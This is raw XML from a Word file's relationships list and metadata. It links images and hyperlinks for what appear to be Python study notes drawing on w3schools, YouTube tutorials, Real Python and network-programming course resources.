Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_format.asp" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_rfind.asp" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.png"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackabuse.com/file-handling-in-python/" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=DMRsBQ1TTzU" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=bYYd_IlOb9k&amp;list=PLdbtMgV1x_BgL1Zns9Nx3f8qG_IRU8G4A&amp;index=12&amp;pp=gAQBiAQB" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_isspace.asp" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_title.asp" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.png"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image115.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=mMv6OSuitWw&amp;list=PLdbtMgV1x_BgL1Zns9Nx3f8qG_IRU8G4A&amp;index=7" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_index.asp" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_rindex.asp" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.png"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.png"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image121.png"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image130.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/python_ref_string.asp" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_istitle.asp" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_translate.asp" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.png"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.png"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=t5Bo1Je9EmE&amp;t=52s&amp;pp=ygUfcHl0aG9uIG11bHRpcHJvY2Vzc2luZyB0dXRvcmlhbA%3D%3D" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_isalnum.asp" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_rjust.asp" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_maketrans.asp" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oIQyPeBhs_4&amp;list=PL8KnQ7ULK8egs86oy1gRRa21CGDrEefPw&amp;index=2" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image122.png"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image125.png"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image127.png"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://realpython.com/intro-to-python-threading/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=NpmFbWO6HPU&amp;list=PLdbtMgV1x_BgL1Zns9Nx3f8qG_IRU8G4A&amp;index=19&amp;pp=gAQBiAQB" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_capitalize.asp" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_isupper.asp" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_upper.asp" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.png"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=3QiPPX-KeSc&amp;list=PLdbtMgV1x_BgL1Zns9Nx3f8qG_IRU8G4A&amp;index=26&amp;pp=gAQBiAQB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www.w3schools.com/python/ref_string_islower.asp" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_startswith.asp" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.png"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.png"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image119.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_isalpha.asp" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_rpartition.asp" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=AZnGRKFUU0c&amp;t=1128s&amp;pp=ygUfcHl0aG9uIG11bHRpcHJvY2Vzc2luZyB0dXRvcmlhbA%3D%3D" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.png"/><Relationship Id="rId15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hyperlink" Target="https://www.w3schools.com/python/ref_string_expandtabs.asp" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_partition.asp" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.png"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.png"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=Ju4xkvFm07o&amp;list=PLyb_C2HpOQSDUh4kIJnprJjh5n5Wqsww8" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/21220916/writing-bits-to-a-binary-file" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image131.png"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=tJxcKyFMTGo" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image128.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_casefold.asp" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_join.asp" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=mrjq3lFz23s&amp;list=PLdbtMgV1x_BgL1Zns9Nx3f8qG_IRU8G4A&amp;index=8&amp;pp=gAQBiAQB" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_isnumeric.asp" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_strip.asp" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_zfill.asp" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.png"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.png"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.python.org/3/installing/index.htm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80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.png"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://realpython.com/courses/threading-python/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_isascii.asp" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_rsplit.asp" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.png"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.png"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=PJ4t2U15ACo&amp;list=PLeo1K3hjS3uub3PRhdoCTY8BxMKSW7RjN" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=bEA8HI_I5bQ" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=2Fp1N6dof0Y" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_center.asp" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_ljust.asp" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://peps.python.org/pep-0008/" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.png"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/53798660/pyinstaller-command-not-found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hyperlink" Target="https://www.w3schools.com/python/ref_string_isdecimal.asp" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_rstrip.asp" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://problemsolvingwithpython.com/01-Orientation/01.03-Installing-Anaconda-on-Windows/" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.png"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.png"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image126.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_count.asp" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_lower.asp" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_split.asp" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.png"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=l5WU7d49OGk&amp;list=PLS1QulWo1RIZGSgRsn0b8w9uoWM1gHDpo" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image117.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_isdigit.asp" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_lstrip.asp" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.anaconda.com/download" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.png"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.png"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=fKl2JW_qrso&amp;list=PLdbtMgV1x_BiBTh_JwYpzramnhzOLgXvx" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.png"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://note.nkmk.me/en/python-re-match-object-span-group/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_encode.asp" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_isidentifier.asp" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.png"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image118.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_splitlines.asp" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36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40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_endswith.asp" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.png"/><Relationship Id="rId178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117</Pages>
  <Words>9481</Words>
  <Characters>54048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63403</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="486" baseType="variant">
      <vt:variant>
        <vt:i4>8126511</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>240</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://localhost:8089/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>8126511</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>237</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://localhost:8089/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4194397</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>234</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.udemy.com/course/python-network-programming-for-network-engineers-python-3/learn/lecture/18951898?start=15</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>content</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>393303</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>231</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/playlist?list=PLhfrWIlLOoKM72gSX1V1FAfw86vGT-FOD</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3014715</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>228</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.gns3.com/software/download</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5374036</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>225</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://realpython.com/courses/threading-python/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5505097</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>222</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://realpython.com/intro-to-python-threading/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4063358</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>219</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=DMRsBQ1TTzU</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>65556</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>216</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://note.nkmk.me/en/python-re-match-object-span-group/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>:~:text=When%20a%20string%20matches%20a%20regex%20pattern%20using%20match(),a%20match%20object%20is%20returned.&amp;text=You%20can%20get%20the%20position,end()%20%2C%20and%20span()%20</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>6357089</vt:i4>
